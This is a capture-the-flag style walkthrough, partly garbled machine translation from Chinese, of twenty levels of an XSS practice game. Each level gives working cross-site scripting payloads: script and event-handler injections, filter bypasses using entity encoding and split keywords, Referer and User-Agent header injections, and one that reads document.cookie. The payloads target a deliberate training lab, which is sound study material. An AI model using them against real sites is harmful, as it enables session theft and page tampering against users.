Explanation
Xss a practice platform online Address: http://test.xss.tv/
xss conventional ideas:
1. go first injection point
2. find the output point
3. Retry continuously output the payload position, format, according to the display
LEVEL-1
payload
http://test.ctf8.com/level1.php?name=%3Cscript%3Ealert(/xss/)%3C/script%3E
http://test.ctf8.com/level1.php?name=%3Csvg/onload=alert(1)%3E
http://test.ctf8.com/level1.php?name=%3Cimg%20src=1%20onerror=alert(1)%3E
http://test.ctf8.com/level1.php?name=%%3Ca%20href=%22javascript:alert(1)%22%3Etest%3C/a%3E
LEVEL-2
Obviously, the above angle brackets was filtered, and the following but not
PHP in 'the variables will not be executed
"Variables performed as long as the closure can be double quotes
payload
http://test.ctf8.com/level2.php?keyword=%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E
http://test.ctf8.com/level4.php?keyword="onclick="window.alert()
LEVEL-3
htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。
预定义的字符是:
& (和号)成为 &
" (双引号)成为 "
' (单引号)成为 '
< (小于)成为 <
> (大于)成为 >
payload
http://test.ctf8.com/level3.php?keyword=%27onclick%3D%27window.alert%28%29&submit=%E6%90%9C%E7%B4%A2
LEVEL-4
payload
http://test.ctf8.com/level4.php?keyword=%22onmouseover=%22alert(1)
LEVEL-5
However, the code string of no filter <and character> characters, then we can use labels href attribute configured for pop payload
payload
http://test.ctf8.com/level5.php?keyword=%22%3E%20%3Ca%20href=%22javascript:alert(1)%22%3Exss%3C/a%3E
LEVEL-6
payload
http://test.ctf8.com/level6.php?keyword=%22ONclick%3D%22window.alert%28%29&submit=%E6%90%9C%E7%B4%A2
LEVEL-7
payload
http://test.ctf8.com/level7.php?keyword=%22%3E%3CScrscriptipt%3Ealert(1)%3C/Scriscriptpt%3E
LEVEL-8
Javascript:伪协议后面可以使用URL编码。
如:<a href="javascript:%61lert(1)">click me</a>可成功执行弹窗。
可用img就不行:<img src=1 onerror="javascript:%61lert(1)">
因为href属性会跳转到其中的URL,而会进行URL解码,onerror属性只会执行JS,不跳转同时后面的url编码可以再做一次entity(HTML实体)编码:
<a href="javascript:%61lert(1)">click me</a>payload
http://test.ctf8.com/level8.php?keyword=javascri%26%23x0070%3Bt%3Aalert%28%29&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5
LEVEL-9
Just let it detects http, but can not play a role in it, so you can use the comment
payload
http://test.ctf8.com/level9.php?keyword=javascri%26%23x0070%3Bt%3Aalert%281%29%2F*http%3A%2F%2Fwww.baidu.com*%2F&submit=%E6%B7%BB%E5%8A%A0%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5
LEVEL-10
payload
http://test.ctf8.com/level10.php?keyword%20=%20test&t_sort=%22type=%22text%22%20onclick%20=%20%22alert(1)
LEVEL-11
payload
Referer: "onclick=alert(1) type="text" //所添加的Referer头部
LEVEL-12
payload
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 " onclick=alert(1) type="text
LEVEL-13
payload
user=call+me+maybe%3F " onclick=alert(1) type="text"
LEVEL-14
View source, click
This is off currently can not do, I look
LEVEL-15
payload
http://127.0.0.1/xss练习小游戏/level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
LEVEL-16
payload
http://127.0.0.1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F/level16.php?keyword=%3Cimg%0dsrc=1%0donerror=alert()%3E
LEVEL-17
Filter the angle brackets and double quotes, triggering on event
payload
http://127.0.0.1/xss练习小游戏/level17.php?arg01=a&arg02=b%20onclick=alert(1)
LEVEL-18
payload
http://127.0.0.1/xss练习小游戏/level18.php?arg01=a&arg02=%20onclick=alert(1)
LEVEL-19
19, 20 are flash analysis
needs
payload
http://127.0.0.1/xss练习小游戏/level19.php?arg01=version&arg02=%3Ca%20href=%22javascript:alert(document.domain)%22%3Exss_by_SST%3C/a%3E
LEVEL-20
Specific reference freebuf
indeed rarely encountered, count the flash of a few xss
payload
http://127.0.0.1/xss练习小游戏/level20.php?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//%26width%26height